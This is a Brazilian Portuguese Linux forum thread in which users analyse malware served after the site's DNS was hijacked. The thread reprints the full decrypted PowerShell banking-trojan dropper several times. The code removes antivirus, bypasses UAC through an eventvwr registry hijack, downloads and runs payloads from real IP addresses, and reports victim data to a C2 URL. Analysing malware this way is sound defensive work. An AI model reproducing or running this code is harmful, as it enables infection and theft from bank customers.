Denuncie   Favoritos   Indicar  

01 02 03 04 05 06 07 08 09

VOL sofreu sequestro de DNS e foi apontado para um site FAKE

85. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

ANDRE MILKE DOS SANTOS
andremilke
(usa Debian)

Enviado em 25/11/2016 - 13:14h

andremilke escreveu:

Terminei de decriptar o código todo da função, tive que fazer mais algumas iterações descompactando e decriptando.


$ie = New-Object -com internetexplorer.application; 

$ie.visible = $true; 

$ie.navigate("");

$mtx = New-Object System.Threading.Mutex($false, "mtt")

if ($mtx.WaitOne(500)) {

if(-not (Test-Path "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')")){

	(Windows working normally, ignore this log -join '') >> "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')"

	if(((Get-Culture).Name.ToLower() -eq (pt-Br -join '').ToLower())) {

		$dir = (${env:ProgramFiles(x86)}, ${env:ProgramFiles} -ne $null)[0];

		$gbPath = Join-Path $dir (GbPlugin -join '');

		$paths = @{(Join-Path $gbPath gbiehcef.dll) = "104";(Join-Path $gbPath gbiehscd.dll) = "751";(Join-Path $gbPath gbieh.dll) = "001";(Join-Path $gbPath gbiehuni.dll) = "341";(Join-Path ($env:ProgramFiles) "\AppBrad\NetExpress50.exe") = "APP237";(Join-Path ($env:ProgramFiles) Trusteer) = "Trust";(Join-Path ($env:LOCALAPPDATA) "\Aplicativo Itau\itauaplicativo.exe") = "APP341";};

		foreach ($path in $paths.GetEnumerator()) { if(Test-Path $($path.Name) ){ $V1 += $($path.Value) + ","}};

		$avs = (Get-WmiObject -Namespace (root\SecurityCenter2 -join '') -QUERY (SELECT DisplayName FROM AntiVirusProduct -join ''));

		foreach ($av1 in $avs) { $av += $av1.displayName + ","}; 

		if($av -like "*avg*"){

			Start-Process -WindowStyle Hidden powershell.exe -ArgumentList -NoP -NonI -W Hidden -E  $command = 'C:\Windows\System32\cmd.exe /c powershell -NoP -NonI -W Hidden -E "$uninstall32s = gci "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;

$uninstall64s = gci "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;



foreach($uninstall64 in $uninstall64s) {

$uninstall64 = $uninstall64.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";

$uninstall64 = $uninstall64.Trim();

if($uninstall64 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall64  /qn /norestart" -Wait }};

foreach($uninstall32 in $uninstall32s) {

$uninstall32 = $uninstall32.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";

$uninstall32 = $uninstall32.Trim();

if($uninstall32 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall32  /qn /norestart" -Wait }};"';

$path = "HKCU:\Software\Classes\mscfile\shell\open\command";

if ((Get-ItemProperty -Path $path -Name "(default)" -ErrorAction SilentlyContinue) -eq $null){	

New-Item $path -Force |	 New-ItemProperty -Name "(Default)" -Value $command -PropertyType string -Force | Out-Null }

else{exit};

$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath("System")) -ChildPath "eventvwr.exe";

Start-Process -FilePath $eventvwrPath;

Start-Sleep -Seconds 5;

$mscfilePath = "HKCU:\Software\Classes\mscfile"; 

if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force}; -join'' -wait;

			while((get-service -Name (avgwd -join '')).Status -eq (Running -join '')) {Start-Sleep -Seconds 10;}

		}

		$ps = (Get-ChildItem (HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP -join '') -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select Version | Sort-Object Version –Descending)[0].Version;

		if(Test-Path $(Join-Path $dir (WinRAR -join ''))){

			$wr = (.:Winrar-join '')

		}

		if($v1) {

			$durl = "http://130.211.157.13/artw/COF267F9415EF3518C.cab"

			$ll = "COF267F9415EF3518C.cab"

			$output = "$env:APPDATA\$(Microsoft\Windows\Templates\ -join '')" + $ll;

			(New-Object System.Net.WebClient).DownloadFile($durl, $output);

			Start-Process -WindowStyle Hidden  powershell.exe -ArgumentList "-NoP -NonI -W Hidden -E 	$dd = 'COF267F9415EF3518C.cab,C3F5EBEC1';

																										$command = (C:\Windows\System32\cmd.exe /c powershell.exe rundll32 $env:APPDATA\Microsoft\Windows\Templates\ -join '') + $dd;

																										$path = (HKCU:\Software\Classes\mscfile\shell\open\command -join '');

																										if ((Get-ItemProperty -Path $path -Name ((Default) -join '') -ErrorAction SilentlyContinue) -eq $null){	

																										New-Item $path -Force |	 New-ItemProperty -Name ((Default) -join '') -Value $command -PropertyType string -Force | Out-Null }

																										else{exit};

																										$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath((System -join ''))) -ChildPath (eventvwr.exe -join '');

																										Start-Process -FilePath $eventvwrPath;

																										Start-Sleep -Seconds 5;

																										$mscfilePath = (HKCU:\Software\Classes\mscfile -join ''); 

																										if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force};

																										";

		}

		$durl = "http://130.211.157.13/artw/arquivo"

		Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden iex(New-Object Net.WebClient).DownloadString('$durl')"

		$tudo = (Get-WmiObject -Namespace (root\CIMV2-join '') -QUERY (SELECT * FROM Win32_OperatingSystem -join ''));

		$w = [System.Net.WebRequest]::Create("http://31.220.57.180/frontile/LIMITED/LetsGo.php" + "?A=A&Sytem=" + $tudo.CSName + "::" + $tudo.Caption + ".:" + $tudo.CSDVersion +"("+$tudo.OsArchitecture+")"+ "ps.:" + $ps + $wr + "" +"&qual=" + $V1 + "&ele=" + $av).getResponse();

	}

}

$mtx.ReleaseMutex()

$mtx.Dispose()

}


Dei uma olhada no fonte, não é só o Itaú não, tem outros bancos, por exemplo '001' Banco do Brasil e '104' CEF. Pela minha análise, ele primeiro tenta desinstalar os arquivos gbplugin disponíveis na máquina, põe o AVG em hibernação e tenta instalar um .cab dele (COF267F9415EF3518C.cab) para o eventviewer e remove algumas chaves no registro do windows. Executa um arquivo, de uma url 130.211.157.13/artw/arquivo e também faz uma requisição http via get para outro link.


3 0
  • Quote

    •   


    86. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Enzo de Brito Ferber
    EnzoFerber
    (usa FreeBSD)

    Enviado em 25/11/2016 - 13:27h

    Excelente trabalho, @andremilke.
    Realmente muito bom!

    Já pensou em escrever um artigo aqui no VoL sobre todo o processo de análise?
    Seria bem interessante.

    *

    Ainda não entendi o objeto 'b' com indices numéricos e também a última função com os argumentos (t,e,r,n,c,a,p).
    Você tem alguma ideia de como acontece a ligação de tudo?

    Enzo Ferber
    []'s


    
$ indent -kr -i8 src.c
    

    
"(...)all right-thinking people know that (a) K&R are _right_ and (b) K&R are right." 
    
        - linux/Documentation/CodingStyle - TORVALDS, Linus.


    0 0
  • Quote

    • 87. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    ANDRE MILKE DOS SANTOS
    andremilke
    (usa Debian)

    Enviado em 25/11/2016 - 13:39h

    EnzoFerber escreveu:

    Excelente trabalho, @andremilke.
    Realmente muito bom!

    Já pensou em escrever um artigo aqui no VoL sobre todo o processo de análise?
    Seria bem interessante.

    *

    Ainda não entendi o objeto 'b' com indices numéricos e também a última função com os argumentos (t,e,r,n,c,a,p).
    Você tem alguma ideia de como acontece a ligação de tudo?

    Enzo Ferber
    []'s


    
$ indent -kr -i8 src.c
    

    
"(...)all right-thinking people know that (a) K&R are _right_ and (b) K&R are right." 
    
        - linux/Documentation/CodingStyle - TORVALDS, Linus.


    Olá,
    Acredito que o software malicioso está na função DEGRADE, quanto aos demais métodos não analisei, talvez seja alguma distração.
    Se o moderado permitir, seria um prazer escrever o artigo. A função b, por exemplo, é um array chave/valor, onde todas as chaves tem valor vazio.
    Um abraço,
    André Milke

    2 0
  • Quote

    • 88. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Perfil removido
    removido
    (usa Nenhuma)

    Enviado em 25/11/2016 - 13:42h

    EnzoFerber escreveu:

    Excelente trabalho, @andremilke.
    Realmente muito bom!

    Já pensou em escrever um artigo aqui no VoL sobre todo o processo de análise?
    Seria bem interessante.



    Concordo! apoiado.

    --
    Linux Counter: #596371

    0 0
  • Quote

    • 89. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Fábio Berbert de Paula
    fabio
    (usa Debian)

    Enviado em 25/11/2016 - 13:43h

    Vocês teriam a presteza de, no final da depuração, me resumir o que o código malicioso faz? Vou anexar tais informações no material que levarei às autoridades. Quanto mais detalhas e críticas as informações, maiores as chances de darem prioridade a caça as bruxas, ou melhor, ao meliante. Esse cara vai rodar! Deixou muito rastro.


    5 0
  • Quote

    • 90. Meu parecer

    ANDRE MILKE DOS SANTOS
    andremilke
    (usa Debian)

    Enviado em 25/11/2016 - 14:14h

    Fazendo uma análise melhor, meu parecer é o seguinte, o código malicioso encontra-se no objeto DEGRADE. Este inclui um log no sistema dizendo para ignorar quaisquer logs posteriores, pois o Windows está em pleno funcionamento.

    
Windows working normally, ignore this log:
    
(Windows working normally, ignore this log -join '') >> "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')"


    Após, ele faz uma varredura em todos os programas gbplugin do usuário, em diversos bancos diferentes (por exemplo '001' Banco do Brasil e '104' CEF), efetuando tentativa de desinstalação.

    
$gbPath = Join-Path $dir (GbPlugin -join '');
    
		$paths = @{(Join-Path $gbPath gbiehcef.dll) = "104";(Join-Path $gbPath gbiehscd.dll) = "751";(Join-Path $gbPath gbieh.dll) = "001";(Join-Path $gbPath gbiehuni.dll) = "341";(Join-Path ($env:ProgramFiles) "\AppBrad\NetExpress50.exe") = "APP237";(Join-Path ($env:ProgramFiles) Trusteer) = "Trust";(Join-Path ($env:LOCALAPPDATA) "\Aplicativo Itau\itauaplicativo.exe") = "APP341";};
    
		foreach ($path in $paths.GetEnumerator()) { if(Test-Path $($path.Name) ){ $V1 += $($path.Value) + ","}};
    
		$avs = (Get-WmiObject -Namespace (root\SecurityCenter2 -join '') -QUERY (SELECT DisplayName FROM AntiVirusProduct -join ''));
    
		foreach ($av1 in $avs) { $av += $av1.displayName + ","}; 
    
		if($av -like "*avg*"){
    
			Start-Process -WindowStyle Hidden powershell.exe -ArgumentList -NoP -NonI -W Hidden -E  $command = 'C:\Windows\System32\cmd.exe /c powershell -NoP -NonI -W Hidden -E "$uninstall32s = gci "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;
    
$uninstall64s = gci "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;
    

    
foreach($uninstall64 in $uninstall64s) {
    
$uninstall64 = $uninstall64.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";
    
$uninstall64 = $uninstall64.Trim();
    
if($uninstall64 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall64  /qn /norestart" -Wait }};
    
foreach($uninstall32 in $uninstall32s) {
    
$uninstall32 = $uninstall32.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";
    
$uninstall32 = $uninstall32.Trim();
    
if($uninstall32 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall32  /qn /norestart" -Wait }};"';


    Em seguida ele põe o AVG em hibernação e tenta instalar um .cab dele (COF267F9415EF3518C.cab) para o eventviewer e remove algumas chaves no registro do windows. Executa um arquivo, de uma url 130.211.157.13/artw/arquivo e também faz uma requisição http via get para outro link.

    
if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force}; -join'' -wait;
    
			while((get-service -Name (avgwd -join '')).Status -eq (Running -join '')) {Start-Sleep -Seconds 10;}
    
		}
    
		$ps = (Get-ChildItem (HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP -join '') -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select Version | Sort-Object Version –Descending)[0].Version;
    
		if(Test-Path $(Join-Path $dir (WinRAR -join ''))){
    
			$wr = (.:Winrar-join '')
    
		}
    
		if($v1) {
    
			$durl = "http://130.211.157.13/artw/COF267F9415EF3518C.cab"
    
			$ll = "COF267F9415EF3518C.cab"
    
			$output = "$env:APPDATA\$(Microsoft\Windows\Templates\ -join '')" + $ll;
    
			(New-Object System.Net.WebClient).DownloadFile($durl, $output);
    
			Start-Process -WindowStyle Hidden  powershell.exe -ArgumentList "-NoP -NonI -W Hidden -E 	$dd = 'COF267F9415EF3518C.cab,C3F5EBEC1';
    
																										$command = (C:\Windows\System32\cmd.exe /c powershell.exe rundll32 $env:APPDATA\Microsoft\Windows\Templates\ -join '') + $dd;
    
																										$path = (HKCU:\Software\Classes\mscfile\shell\open\command -join '');
    
																										if ((Get-ItemProperty -Path $path -Name ((Default) -join '') -ErrorAction SilentlyContinue) -eq $null){	
    
																										New-Item $path -Force |	 New-ItemProperty -Name ((Default) -join '') -Value $command -PropertyType string -Force | Out-Null }
    
																										else{exit};
    
																										$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath((System -join ''))) -ChildPath (eventvwr.exe -join '');
    
																										Start-Process -FilePath $eventvwrPath;
    
																										Start-Sleep -Seconds 5;
    
																										$mscfilePath = (HKCU:\Software\Classes\mscfile -join ''); 
    
																										if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force};
    
																										";
    
		}
    
		$durl = "http://130.211.157.13/artw/arquivo"
    
		Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden iex(New-Object Net.WebClient).DownloadString('$durl')"
    
		$tudo = (Get-WmiObject -Namespace (root\CIMV2-join '') -QUERY (SELECT * FROM Win32_OperatingSystem -join ''));
    
		$w = [System.Net.WebRequest]::Create("http://31.220.57.180/frontile/LIMITED/LetsGo.php" + "?A=A&Sytem=" + $tudo.CSName + "::" + $tudo.Caption + ".:" + $tudo.CSDVersion +"("+$tudo.OsArchitecture+")"+ "ps.:" + $ps + $wr + "" +"&qual=" + $V1 + "&ele=" + $av).getResponse();
    
	}
    
}

    Função completa decriptada encontra-se abaixo:

    
$ie = New-Object -com internetexplorer.application; 
    
$ie.visible = $true; 
    
$ie.navigate("");
    
$mtx = New-Object System.Threading.Mutex($false, "mtt")
    
if ($mtx.WaitOne(500)) {
    
if(-not (Test-Path "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')")){
    
	(Windows working normally, ignore this log -join '') >> "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')"
    
	if(((Get-Culture).Name.ToLower() -eq (pt-Br -join '').ToLower())) {
    
		$dir = (${env:ProgramFiles(x86)}, ${env:ProgramFiles} -ne $null)[0];
    
		$gbPath = Join-Path $dir (GbPlugin -join '');
    
		$paths = @{(Join-Path $gbPath gbiehcef.dll) = "104";(Join-Path $gbPath gbiehscd.dll) = "751";(Join-Path $gbPath gbieh.dll) = "001";(Join-Path $gbPath gbiehuni.dll) = "341";(Join-Path ($env:ProgramFiles) "\AppBrad\NetExpress50.exe") = "APP237";(Join-Path ($env:ProgramFiles) Trusteer) = "Trust";(Join-Path ($env:LOCALAPPDATA) "\Aplicativo Itau\itauaplicativo.exe") = "APP341";};
    
		foreach ($path in $paths.GetEnumerator()) { if(Test-Path $($path.Name) ){ $V1 += $($path.Value) + ","}};
    
		$avs = (Get-WmiObject -Namespace (root\SecurityCenter2 -join '') -QUERY (SELECT DisplayName FROM AntiVirusProduct -join ''));
    
		foreach ($av1 in $avs) { $av += $av1.displayName + ","}; 
    
		if($av -like "*avg*"){
    
			Start-Process -WindowStyle Hidden powershell.exe -ArgumentList -NoP -NonI -W Hidden -E  $command = 'C:\Windows\System32\cmd.exe /c powershell -NoP -NonI -W Hidden -E "$uninstall32s = gci "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;
    
$uninstall64s = gci "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;
    

    
foreach($uninstall64 in $uninstall64s) {
    
$uninstall64 = $uninstall64.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";
    
$uninstall64 = $uninstall64.Trim();
    
if($uninstall64 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall64  /qn /norestart" -Wait }};
    
foreach($uninstall32 in $uninstall32s) {
    
$uninstall32 = $uninstall32.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";
    
$uninstall32 = $uninstall32.Trim();
    
if($uninstall32 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall32  /qn /norestart" -Wait }};"';
    
$path = "HKCU:\Software\Classes\mscfile\shell\open\command";
    
if ((Get-ItemProperty -Path $path -Name "(default)" -ErrorAction SilentlyContinue) -eq $null){	
    
New-Item $path -Force |	 New-ItemProperty -Name "(Default)" -Value $command -PropertyType string -Force | Out-Null }
    
else{exit};
    
$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath("System")) -ChildPath "eventvwr.exe";
    
Start-Process -FilePath $eventvwrPath;
    
Start-Sleep -Seconds 5;
    
$mscfilePath = "HKCU:\Software\Classes\mscfile"; 
    
if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force}; -join'' -wait;
    
			while((get-service -Name (avgwd -join '')).Status -eq (Running -join '')) {Start-Sleep -Seconds 10;}
    
		}
    
		$ps = (Get-ChildItem (HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP -join '') -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select Version | Sort-Object Version –Descending)[0].Version;
    
		if(Test-Path $(Join-Path $dir (WinRAR -join ''))){
    
			$wr = (.:Winrar-join '')
    
		}
    
		if($v1) {
    
			$durl = "http://130.211.157.13/artw/COF267F9415EF3518C.cab"
    
			$ll = "COF267F9415EF3518C.cab"
    
			$output = "$env:APPDATA\$(Microsoft\Windows\Templates\ -join '')" + $ll;
    
			(New-Object System.Net.WebClient).DownloadFile($durl, $output);
    
			Start-Process -WindowStyle Hidden  powershell.exe -ArgumentList "-NoP -NonI -W Hidden -E 	$dd = 'COF267F9415EF3518C.cab,C3F5EBEC1';
    
																										$command = (C:\Windows\System32\cmd.exe /c powershell.exe rundll32 $env:APPDATA\Microsoft\Windows\Templates\ -join '') + $dd;
    
																										$path = (HKCU:\Software\Classes\mscfile\shell\open\command -join '');
    
																										if ((Get-ItemProperty -Path $path -Name ((Default) -join '') -ErrorAction SilentlyContinue) -eq $null){	
    
																										New-Item $path -Force |	 New-ItemProperty -Name ((Default) -join '') -Value $command -PropertyType string -Force | Out-Null }
    
																										else{exit};
    
																										$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath((System -join ''))) -ChildPath (eventvwr.exe -join '');
    
																										Start-Process -FilePath $eventvwrPath;
    
																										Start-Sleep -Seconds 5;
    
																										$mscfilePath = (HKCU:\Software\Classes\mscfile -join ''); 
    
																										if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force};
    
																										";
    
		}
    
		$durl = "http://130.211.157.13/artw/arquivo"
    
		Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden iex(New-Object Net.WebClient).DownloadString('$durl')"
    
		$tudo = (Get-WmiObject -Namespace (root\CIMV2-join '') -QUERY (SELECT * FROM Win32_OperatingSystem -join ''));
    
		$w = [System.Net.WebRequest]::Create("http://31.220.57.180/frontile/LIMITED/LetsGo.php" + "?A=A&Sytem=" + $tudo.CSName + "::" + $tudo.Caption + ".:" + $tudo.CSDVersion +"("+$tudo.OsArchitecture+")"+ "ps.:" + $ps + $wr + "" +"&qual=" + $V1 + "&ele=" + $av).getResponse();
    
	}
    
}
    
$mtx.ReleaseMutex()
    
$mtx.Dispose()
    
}


    6 0
  • Quote

    • 91. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Mauriciodez
    Mauriciodez
    (usa Debian)

    Enviado em 25/11/2016 - 14:23h

    andremilke escreveu:
    Fazendo uma análise melhor, meu parecer é o seguinte, o código malicioso encontra-se no objeto DEGRADE.

    Após, ele faz uma varredura em todos os programas gbplugin do usuário, em diversos bancos diferentes (por exemplo '001' Banco do Brasil e '104' CEF), efetuando tentativa de desinstalação.

    Em seguida ele põe o AVG em hibernação e tenta instalar um .cab dele



    então no frigir dos ovos o kra colocou um código malicioso para windows em um site linux, esse código por sua vez tenta desinstalar o gbplugin q muita gente tenta desinstalar em vão e ainda tenta hibernar a porcaria do AVG que nem tem essa função ???

    A nemmmmmmmmmmmm gente ... seria trágico se não fosse cômico !!!

    EDIT: Se for apresentar provas contra esse rapaz, apresente só a prova da invasão !!!

    ___________________________________________________________________________________________
    " Nem sempre é amigo aquele que te tira do buraco !!! ( Saddam Hussein )"

    0 0
  • Quote

    • 92. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    ANDRE MILKE DOS SANTOS
    andremilke
    (usa Debian)

    Enviado em 25/11/2016 - 14:30h

    Mauriciodez escreveu:

    andremilke escreveu:
    Fazendo uma análise melhor, meu parecer é o seguinte, o código malicioso encontra-se no objeto DEGRADE.

    Após, ele faz uma varredura em todos os programas gbplugin do usuário, em diversos bancos diferentes (por exemplo '001' Banco do Brasil e '104' CEF), efetuando tentativa de desinstalação.

    Em seguida ele põe o AVG em hibernação e tenta instalar um .cab dele



    então no frigir dos ovos o kra colocou um código malicioso para windows em um site linux, esse código por sua vez tenta desinstalar o gbplugin q muita gente tenta desinstalar em vão e ainda tenta hibernar a porcaria do AVG que nem tem essa função ???

    A nemmmmmmmmmmmm gente ... seria trágico se não fosse cômico !!!

    EDIT: Se for apresentar provas contra esse rapaz, apresente só a prova da invasão !!!

    ___________________________________________________________________________________________
    " Nem sempre é amigo aquele que te tira do buraco !!! ( Saddam Hussein )"

    Olá Maurício, não sabemos o que tem no cab e no link que ele dá o get, deve ter algum arquivo para capturar as senhas dos usuários nestes bancos. Quanto a hibernação, acredito que ele execute direto no processo do windows do AVG.


    0 0
  • Quote

    • 93. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Perfil removido
    removido
    (usa Nenhuma)

    Enviado em 26/11/2016 - 02:11h

    Ufa! Que discussão! Que tópico!
    Até faz esquecer daquelas amenidades sobre Kali.

    No caso de pegar senha, não sei dizer o que ocorre após o download daquele arquivo .ZIP.
    Não sei dizer se após o tal download, que trava a tela, aparecem campos do site falso que permitem uma tentativa de falso login.

    Então o cidadão vai lá e digita login mais senha e babau!
    Armazenados nos dados de quem montou o site falso.
    Apenas um deslize simples.
    Como eu nem cheguei a fazer download, não sei o que ocorre depois.

    Sugiro A QUEM TENTOU LOGIN no site falso (caso fora possível) a mudar de senha.
    Não sei se há ou houve alguma tentativa de redirecionamento do site falso ao verdadeiro para disfarçar.

    A análise está genial. Vou acompanhar até o fim. Tomara que saia artigo.

    ----------------------------------------------------------------------------------------------------------------
    Nem direita, nem esquerda. Quando se trata de corrupção o Brasil é ambidestro.
    (anônimo)

    Encryption works. Properly implemented strong crypto systems are one of the few things that you can rely on. Unfortunately, endpoint security is so terrifically weak that NSA can frequently find ways around it. — Edward Snowden


    0 0
  • Quote

    • 94. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    ANDRE MILKE DOS SANTOS
    andremilke
    (usa Debian)

    Enviado em 28/11/2016 - 08:18h

    listeiro_037 escreveu:

    Ufa! Que discussão! Que tópico!
    Até faz esquecer daquelas amenidades sobre Kali.

    No caso de pegar senha, não sei dizer o que ocorre após o download daquele arquivo .ZIP.
    Não sei dizer se após o tal download, que trava a tela, aparecem campos do site falso que permitem uma tentativa de falso login.

    Então o cidadão vai lá e digita login mais senha e babau!
    Armazenados nos dados de quem montou o site falso.
    Apenas um deslize simples.
    Como eu nem cheguei a fazer download, não sei o que ocorre depois.

    Sugiro A QUEM TENTOU LOGIN no site falso (caso fora possível) a mudar de senha.
    Não sei se há ou houve alguma tentativa de redirecionamento do site falso ao verdadeiro para disfarçar.

    A análise está genial. Vou acompanhar até o fim. Tomara que saia artigo.

    ----------------------------------------------------------------------------------------------------------------
    Nem direita, nem esquerda. Quando se trata de corrupção o Brasil é ambidestro.
    (anônimo)

    Encryption works. Properly implemented strong crypto systems are one of the few things that you can rely on. Unfortunately, endpoint security is so terrifically weak that NSA can frequently find ways around it. — Edward Snowden

    Se o Fábio autorizar, escrevo o artigo.


    0 0
  • Quote

    • 95. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Fábio Berbert de Paula
    fabio
    (usa Debian)

    Enviado em 28/11/2016 - 09:48h

    Se o Fábio autorizar, escrevo o artigo.


    Autorizado.

    3 0
  • Quote

    • 96. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

    Ricardo Fabiano Silva
    madrugada
    (usa Gentoo)

    Enviado em 28/11/2016 - 10:59h

    Quando eu acessei, não me recordo de ter feito login. Aparentemente era uma página estática com a mensagem de atualizar o navegador. Eu fiz o acesso pelo android e baixei o arquivo zip, mas não cheguei a abrir. Alguém realmente chegou a ver tela de login?

    0 0
  • Quote


    • 01 02 03 04 05 06 07 08 09



    Patrocínio

    Site hospedado pelo provedor RedeHost.
    Linux banner

    Destaques

    Artigos

    Compartilhando a tela do Computador no Celular via Deskreen

    Como Configurar um Túnel SSH Reverso para Acessar Sua Máquina Local a Partir de uma Máquina Remota

    Configuração para desligamento automatizado de Computadores em um Ambiente Comercial

    O mínimo que você precisa saber sobre o terminal (parte 2)

    O mínimo que você precisa saber sobre o terminal (parte 1)

    Dicas

    Como renomear arquivos de letras maiúsculas para minúsculas

    Imprimindo no formato livreto no Linux

    Vim - incrementando números em substituição

    Efeito "livro" em arquivos PDF

    Como resolver o erro no CUPS: Unable to get list of printer drivers

    Tópicos

    Não to conseguindo resolver este problemas ao instalar o playonelinux (1)

    Excluir banco de dados no xampp (1)

    phpmyadmin não abre no xampp (2)

    Ubuntu não sai som (0)

    KeepOS Não consigo usar o comando sudo. (4)

    Top 10 do mês

    Scripts

    [Python] Automação de scan de vulnerabilidades

    [Python] Script para analise de superficie de ataque

    [Shell Script] Novo script para redimensionar, rotacionar, converter e espelhar arquivos de imagem

    [Shell Script] Iniciador de DOOM (DSDA-DOOM, Doom Retro ou Woof!)

    [Shell Script] Script para adicionar bordas às imagens de uma pasta

    A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.

    Site hospedado por: